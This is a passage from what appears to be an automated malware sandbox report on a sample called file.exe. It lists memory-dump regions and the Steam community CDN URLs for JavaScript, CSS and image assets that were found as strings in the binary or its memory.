file.exe, 00000000.00000003.1187295208.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132235158.00000000053E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
            Source: file.exe, 00000000.00000003.1137069557.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1103118777.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193193906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1137219703.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187388354.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1194643055.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187351626.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187295208.0000000000A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=jfdb
            Source: file.exe, 00000000.00000003.1137069557.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1103118777.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193193906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187388354.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1194643055.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187351626.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187295208.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=D1VziU1eIKI3&l=englis
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a
            Source: file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&l=
            Source: file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli
            Source: file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=engli
            Source: file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=iGFW_JMULCcZ&
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l
            Source: file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_co?
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD
            Source: file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=whw8EcafG167&amp
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/sh8
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164596542.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193503319.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196473496.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187422565.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl
            Source: file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196614765.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164596542.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193503319.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196473496.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187422565.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=sd6kCnGQW5Ji&
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164596542.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193503319.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196473496.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187422565.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196614765.0000000005436000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
            Source: file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 